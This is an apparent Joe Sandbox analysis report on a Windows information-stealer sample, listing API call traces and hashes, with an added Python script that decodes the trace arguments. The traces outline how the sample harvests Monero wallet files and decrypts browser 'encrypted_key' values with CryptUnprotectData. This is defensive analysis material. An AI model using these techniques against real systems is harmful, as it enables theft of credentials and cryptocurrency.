                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 698de9d73fe03e4bc971020ba7bf34f6967b69c8f0625137f1fac441dc2f6ac1
                          • Instruction ID: ef5d785badd4e217e6b6f24a48f37584ee97b4c5d52ab68ec606940b097a11ec
                          • Opcode Fuzzy Hash: 698de9d73fe03e4bc971020ba7bf34f6967b69c8f0625137f1fac441dc2f6ac1
                          • Instruction Fuzzy Hash: 9401E9B5500108FFCB04DFEDC988EAE7BB9EB84350F148158F909AB244C631AB41DB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CB12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CB12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00CB12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 815968efa061220fac865d38c92941f61414d7311bd8198175547c83584e1627
                          • Instruction ID: e5faa113a4db56ab4282881d052c602f9c3abd524e35bf0c3ef798450c37a036
                          • Opcode Fuzzy Hash: 815968efa061220fac865d38c92941f61414d7311bd8198175547c83584e1627
                          • Instruction Fuzzy Hash: A60136F9A40208BFDB04DFD1DC49FAEB7B8EB88701F048155FA09AB280D670AA05CF51
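The API trace lines in these records print every argument as raw hex, so the decisions that matter (which registry hive, which access mask, which shell folder, which open disposition) are easy to skim past. The decoder below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses the trace-line format used in the "APIs" sections above and names the constants for RegOpenKeyExA, CreateFileA, SHGetFolderPathA and LocalAlloc. Two things it makes visible in the records on this page: the samDesired value 0x20119 passed to both RegOpenKeyExA calls (HKEY_CURRENT_USER in one, HKEY_LOCAL_MACHINE in the other) is KEY_READ | KEY_WOW64_64KEY, so this 32-bit sample asks for the native 64-bit registry view instead of the WOW64-redirected one (the flag is ignored on 32-bit Windows); and the CSIDL 0x1C handed to SHGetFolderPathA in the lstrcat path-building function is CSIDL_LOCAL_APPDATA, while CreateFileA opens with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING. One caveat the decoder encodes rather than hides: the plugin prints whatever sits in the stack slots at the call site, so for a zero-argument API such as GetProcessHeap the printed values (00000000, 00000104) are not its arguments. 0x104 is MAX_PATH; reading it as the size passed to the RtlAllocateHeap that follows is a plausible inference, not something the trace states.

```python
import re
from typing import Dict, List, Optional

# Added example for this page (editor's code, not from the Joe Sandbox report or
# the sample): parse the "APIs" trace lines of the records above and resolve the
# raw hex arguments to the Windows constants an analyst wants to see.

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
SAM_BITS = [(0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x2, "KEY_SET_VALUE"),
            (0x4, "KEY_CREATE_SUB_KEY"), (0x20, "KEY_CREATE_LINK")]
ACCESS_BITS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
SHARE_BITS = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]


def _flags(value: int, bits, composite=None) -> List[str]:
    """Name the set bits of value; a composite mask such as KEY_READ is matched first."""
    names, rem = [], value
    if composite and (rem & composite[0]) == composite[0]:
        names.append(composite[1])
        rem &= ~composite[0]
    for bit, name in bits:
        if rem & bit:
            names.append(name)
            rem &= ~bit
    if rem:
        names.append(hex(rem))  # bits this table does not know
    return names


def _int(arg: str) -> Optional[int]:
    """Eight hex digits -> int; '?' and string literals -> None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def parse_line(line: str) -> Optional[Dict]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args") or ""
    return {"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "subcall": m.group("sub"),
            "args": [a.strip() for a in raw.split(",")] if raw else []}


def decode(call: Dict) -> Dict[str, object]:
    """Annotate argument slots whose meaning the API prototype fixes.
    The plugin dumps the stack slots at the call site, so for a zero-argument
    API such as GetProcessHeap the printed values are not its arguments and
    nothing is decoded."""
    api, v = call["api"], [_int(a) for a in call["args"]]
    notes: Dict[str, object] = {}
    if api in ("RegOpenKeyExA", "RegOpenKeyExW") and len(v) >= 4:
        if v[0] is not None:
            notes["hKey"] = HKEY.get(v[0], hex(v[0]))
        if v[3] is not None:
            notes["samDesired"] = _flags(v[3], SAM_BITS, (KEY_READ, "KEY_READ"))
    elif api in ("CreateFileA", "CreateFileW") and len(v) >= 5:
        if v[1] is not None:
            notes["dwDesiredAccess"] = _flags(v[1], ACCESS_BITS)
        if v[2] is not None:
            notes["dwShareMode"] = _flags(v[2], SHARE_BITS)
        if v[4] is not None:
            notes["dwCreationDisposition"] = DISPOSITION.get(v[4], hex(v[4]))
    elif api in ("SHGetFolderPathA", "SHGetFolderPathW") and len(v) >= 2 and v[1] is not None:
        notes["csidl"] = CSIDL.get(v[1] & 0xFF, hex(v[1]))  # drops CSIDL_FLAG_* high bits
    elif api == "LocalAlloc" and v and v[0] is not None:
        notes["uFlags"] = "LPTR (LMEM_FIXED|LMEM_ZEROINIT)" if v[0] == 0x40 else hex(v[0])
    return notes


def decode_block(text: str) -> List[Dict]:
    """Parse and decode every trace line in a pasted 'APIs' block."""
    out = []
    for line in text.splitlines():
        call = parse_line(line)
        if call:
            call["decoded"] = decode(call)
            out.append(call)
    return out


# Trace lines copied from the records above.
SAMPLE_TRACE = """\
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
• LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
  • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
• RegOpenKeyExA.ADVAPI32(80000001,0189D808,00000000,00020119,?), ref: 00CC40F4
• RegOpenKeyExA.ADVAPI32(80000002,0188BD78,00000000,00020119,?), ref: 00CC7E5E
• wsprintfA.USER32 ref: 00CC45A6
"""

if __name__ == "__main__":
    for call in decode_block(SAMPLE_TRACE):
        print(call["api"], call["ref"], call["decoded"])
```

Paste any "APIs" block from the report into decode_block to get the same annotations; the tables only cover the APIs that appear on this page and leave unknown bits as hex rather than guessing, which is the behaviour you want when a sample passes an access mask you have not seen before.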
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 13f8afa66d5274b5de3c22d30a4984fc5b0150c05463db0c0e24feba42409f50
                          • Instruction ID: 496bc8ba08309ff283f93ad2ab8174f552a1c77c23c10d0edb4a08c34ffa0d8b
                          • Opcode Fuzzy Hash: 13f8afa66d5274b5de3c22d30a4984fc5b0150c05463db0c0e24feba42409f50
                          • Instruction Fuzzy Hash: B341B2B150079C9EDB218B24CDC5FFBBBE8AB45704F1844ECE99A86182E2719B45DF60
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00CC6663
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC6726
                          • ExitProcess.KERNEL32 ref: 00CC6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: a3a9d88fbef733cc3ec5281c4356f6ff8cbcd7904d79ee09d1b4698f26089aac
                          • Instruction ID: 80846992026d7cc51afca9c6af60539065feb933ab72ed70a4ad9ebf778ecf7b
                          • Opcode Fuzzy Hash: a3a9d88fbef733cc3ec5281c4356f6ff8cbcd7904d79ee09d1b4698f26089aac
                          • Instruction Fuzzy Hash: 983138B1801208AFDB14EB91DC86FEEB778AF44304F404199F20976191DF746B49DF6A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CD0E28,00000000,?), ref: 00CC882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8836
                          • wsprintfA.USER32 ref: 00CC8850
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: aa03cc755037dccd757166d8fa3d9e19ed8bf44579631f2dd77b28059a0d9ca9
                          • Instruction ID: d9548ee78ae505c65be0758074ea550fd85f4e3ad9f0781a6fa97a3fc40fab16
                          • Opcode Fuzzy Hash: aa03cc755037dccd757166d8fa3d9e19ed8bf44579631f2dd77b28059a0d9ca9
                          • Instruction Fuzzy Hash: B82130B1A40208AFDB04DF95DD49FBEBBB8FB48711F144169F609BB280C7799904CBA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00CC951E,00000000), ref: 00CC8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8D62
                          • wsprintfW.USER32 ref: 00CC8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 1b8153cb68fadb94796e740cf88f58d040b5d48446fe0f5cc3c504041e4d570c
                          • Instruction ID: 81e292ebef84ab07692dad2ee6a69fd93cd398c769dd2db9e5b07685076de0ed
                          • Opcode Fuzzy Hash: 1b8153cb68fadb94796e740cf88f58d040b5d48446fe0f5cc3c504041e4d570c
                          • Instruction Fuzzy Hash: 41E086B1A40208BFC704DB95DC0EE6977B8EB44701F040065FD0D9B280D9715E04DB52
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00CBA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00CBA6BC
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7727c85c1e25c4d6135c743dcaa6d04dd6b67b87e9a045bd797935c0410a1c6b
                          • Instruction ID: 668bd65c96fff11366d87111b82574ce73a03e0bb4cf8c06ff12d5c1e49caf96
                          • Opcode Fuzzy Hash: 7727c85c1e25c4d6135c743dcaa6d04dd6b67b87e9a045bd797935c0410a1c6b
                          • Instruction Fuzzy Hash: D5E10B7281010C9BCB14EBA5DC9AFEE7338AF54304F54816DF516B6091EE306A4EEB66
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBD481
                          • lstrlen.KERNEL32(00000000), ref: 00CBD698
                          • lstrlen.KERNEL32(00000000), ref: 00CBD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 410c0f6c6be15471002c56c1cefa34e59f81ddecfaf1012e4e63aaeccc81981f
                          • Instruction ID: 648d40d47e02ff2089aff392902ef1860e784cac36c33d3ed9c0abf3e34bbc24
                          • Opcode Fuzzy Hash: 410c0f6c6be15471002c56c1cefa34e59f81ddecfaf1012e4e63aaeccc81981f
                          • Instruction Fuzzy Hash: 0A91F97291010C9BCB04FBA5DC9AFEE7338AF54308F54416DF516B6091EF346A4AEB62
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBD801
                          • lstrlen.KERNEL32(00000000), ref: 00CBD99F
                          • lstrlen.KERNEL32(00000000), ref: 00CBD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 2d99c5c9347fe8ee309274d5956df1db97cdf1388bf6d5a762e65b9ee0a0c62a
                          • Instruction ID: 3f941bf998959f69fd295c97e0072df77d35b2694236cfcb81085b556624736e
                          • Opcode Fuzzy Hash: 2d99c5c9347fe8ee309274d5956df1db97cdf1388bf6d5a762e65b9ee0a0c62a
                          • Instruction Fuzzy Hash: C981EB7291010C9BDB04FBA5DC9AFEE7338AF54304F54416DF507B6091EE346A0AEBA2
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00CD1580,00CD0D92), ref: 00CBF54C
                          • lstrlen.KERNEL32(00000000), ref: 00CBF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 1b35348d7b9a6d0965fcaed971f72a2f0c289343135f27effeacb68dd9e26991
                          • Instruction ID: 01df93079552fff8f9177fb685dacff90bec5016681f262edfc2396892491e0b
                          • Opcode Fuzzy Hash: 1b35348d7b9a6d0965fcaed971f72a2f0c289343135f27effeacb68dd9e26991
                          • Instruction Fuzzy Hash: 17510171D1010CABDB04FBA4EC5AFED7378AF54304F40852DF916A7191EE346A0ADBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: fa74a1c019c7a3bda59a607af53a969066d97920c6d79f3886b83d1bfa93dff2
                          • Instruction ID: 1b3b5c5ed2888c88cb52aaf226834de32886563e6f332e87f3c684eb8ae1a93d
                          • Opcode Fuzzy Hash: fa74a1c019c7a3bda59a607af53a969066d97920c6d79f3886b83d1bfa93dff2
                          • Instruction Fuzzy Hash: 76413EB1D10149AFCB04EFA5D849FEEB774BB44704F10842CF51676291EB74AA09DFA2
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CB9D39
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                            • Part of subcall function 00CB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                            • Part of subcall function 00CB9AC0: LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                            • Part of subcall function 00CB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB9B84
                            • Part of subcall function 00CB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00CB9BA3
                            • Part of subcall function 00CB9B60: LocalFree.KERNEL32(?), ref: 00CB9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
